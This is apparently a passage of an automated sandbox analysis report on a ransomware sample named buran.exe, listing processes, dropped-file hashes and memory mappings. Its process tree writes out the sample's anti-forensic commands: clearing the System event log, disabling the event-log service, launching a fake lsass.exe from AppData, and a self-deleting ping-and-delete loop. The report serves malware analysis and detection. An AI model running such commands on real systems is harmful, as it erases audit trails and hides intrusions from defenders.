-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe clear-log System4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C sc config eventlog start=disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc config eventlog start=disabled4⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 03⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 13⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del "C:\Users\Admin\AppData\Local\Temp\buran.exe" & if not exist "C:\Users\Admin\AppData\Local\Temp\buran.exe" exit )2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping -n 3 127.13⤵
- Runs ping.exe
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CBMD5
149e1d142e9d7c2fca97f1fef05c59c8
SHA185a61dcf4a5474018cde498c8ae4f45c6c4c63c3
SHA256ad06238a22fe68072bf7ab8f7b4423dc7c90296e41c7f3d7a16cc6d6f7010a82
SHA512a8ff1e8effe3a9d458db74b9239f530b39f7b5ea74921ea285762e167d20d216698729ea60a94dec60e1ee6913245c4b1c56d66cf2252dc80fa1e7fff94ce17a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEEMD5
bb43ca1db0fadc6ae53f5f74b390683b
SHA15785179b5a50c78c5f7b0575d34566a3f417d151
SHA2567f3f97971e82a3aeaacb64f8feb0ef7df11db650211c065e92a320bf4adc0690
SHA5124611364f95ccbaec4f29ca1728374c452b93c51b5debad83828d3fde5fdc5c0ac090134a7a759fa5e2d9de018a0871354a482bb9f023564938adf0ba51bcb32d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EMD5
7769e706f7b0c56e9605a81623599f0b
SHA13d83a8866e647b78d8201cb4a0500ce926b76f68
SHA256ccf11aa28a6025572b9b4c89c12ce6f557bf6a578f187d7bfd6cd6f993b8ea63
SHA512d7187bf6636b23bb53c169ea714f2ab0b5994595ca8bb7347f7071ea10d322c398f092c2185151e7fed368bc08a92505fff387feeacd970b2ba877176aab73b6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CBMD5
01af71658f8903dab9568aea0cccda57
SHA1eee0461ce62be9028842632862149fd6edc2af19
SHA25621cfc25e74da4f93a3532dbb3a9202a8dde43d393b8c16e2113cc2c22f8a1a76
SHA5129b919a08c308735298434067a96cb28ebfe569716bfeaa2ae505662846d80b6758bb35ac9729d865af133318e25de17a311d519788474d793e88c88fd2fd376b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEEMD5
c5dd9d4db0f4f6b03a6291a6faefb9fb
SHA18930d13e692723bb10ee8b6d78dea8b2e694490e
SHA2566d34671eb68fe86da4f46521d1d92bf68fd970a0c8c2418f7b7ab878918408b1
SHA512e7f1fe083c2134250bf47bb77be171712a3afdfba35264ae0a3bd6221e9b8b417c53f2ca555d589db1f6c037386f04fe28b1e006cd906bee52f8cb1b942c3bf0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EMD5
7ba42e82897d6cc5badc96eeac5eb59c
SHA105720eb516a52cd1b9f38e17ec1312d5cbba645b
SHA256247e78221185de959fc87612603a469a6a68b1398c1b7b9e21c791de2e8c72d9
SHA512695c73d06709da6247ddeb1b8778262daa5c90e1f0c7fdacddf490a5602db05815fe245f24312d2e7800fa7e91a37fc2bde9c8aeaa4f1c34ee4862e9a39193d8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\RW8YYLAG\1QE7L3Q8.htmMD5
b1cd7c031debba3a5c77b39b6791c1a7
SHA1e5d91e14e9c685b06f00e550d9e189deb2075f76
SHA25657ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa
SHA512d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\UOAPEAJQ\R108ESDY.htmMD5
8615e70875c2cc0b9db16027b9adf11d
SHA14ed62cf405311c0ff562a3c59334a15ddc4f1bf9
SHA256da96949ba6b0567343f144486505c8c8fa1d892fd88c9cbc3ef3d751a570724d
SHA512cd9dfc88dc2af9438b7d6b618d1b62029b3bdf739fc4daa5b37397afd12c4528561b3bf2fc3f3f2adf3fd1f582d5524332441fd30248fcd078e41aa91e17cb73
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exeMD5
3058d76e5fb2f2d2f65e232e98536182
SHA13e6e9abd6241526bf932885d118cbbe54e4e1cbe
SHA2565c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f
SHA512b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exeMD5
3058d76e5fb2f2d2f65e232e98536182
SHA13e6e9abd6241526bf932885d118cbbe54e4e1cbe
SHA2565c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f
SHA512b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exeMD5
3058d76e5fb2f2d2f65e232e98536182
SHA13e6e9abd6241526bf932885d118cbbe54e4e1cbe
SHA2565c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f
SHA512b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exeMD5
3058d76e5fb2f2d2f65e232e98536182
SHA13e6e9abd6241526bf932885d118cbbe54e4e1cbe
SHA2565c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f
SHA512b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95
-
memory/188-24-0x0000000000000000-mapping.dmp
-
memory/208-2-0x0000000000000000-mapping.dmp
-
memory/496-29-0x0000000000000000-mapping.dmp
-
memory/1056-7-0x0000000000000000-mapping.dmp
-
memory/1128-43-0x0000000000000000-mapping.dmp
-
memory/1160-22-0x0000000000000000-mapping.dmp
-
memory/1276-33-0x0000000000000000-mapping.dmp
-
memory/1380-45-0x0000000000000000-mapping.dmp
-
memory/1400-41-0x0000000000000000-mapping.dmp
-
memory/1636-5-0x0000000000000000-mapping.dmp
-
memory/1648-38-0x0000000000000000-mapping.dmp
-
memory/2100-9-0x0000000000000000-mapping.dmp
-
memory/2120-37-0x0000000000000000-mapping.dmp
-
memory/2128-34-0x0000000000000000-mapping.dmp
-
memory/2184-40-0x0000000000000000-mapping.dmp
-
memory/2208-25-0x0000000000000000-mapping.dmp
-
memory/2356-17-0x0000000000000000-mapping.dmp
-
memory/2392-30-0x0000000000000000-mapping.dmp
-
memory/2452-32-0x0000000000000000-mapping.dmp
-
memory/2504-23-0x0000000000000000-mapping.dmp
-
memory/2540-3-0x0000000000000000-mapping.dmp
-
memory/2588-31-0x0000000000000000-mapping.dmp
-
memory/2748-39-0x0000000000000000-mapping.dmp
-
memory/3012-19-0x0000000000000000-mapping.dmp
-
memory/3052-27-0x0000000000000000-mapping.dmp
-
memory/3060-36-0x0000000000000000-mapping.dmp
-
memory/3184-18-0x0000000000000000-mapping.dmp
-
memory/3204-21-0x0000000000000000-mapping.dmp
-
memory/3548-42-0x0000000000000000-mapping.dmp
-
memory/3576-28-0x0000000000000000-mapping.dmp
-
memory/3588-20-0x0000000000000000-mapping.dmp
-
memory/3820-26-0x0000000000000000-mapping.dmp
-
memory/3836-44-0x0000000000000000-mapping.dmp
-
memory/4076-35-0x0000000000000000-mapping.dmp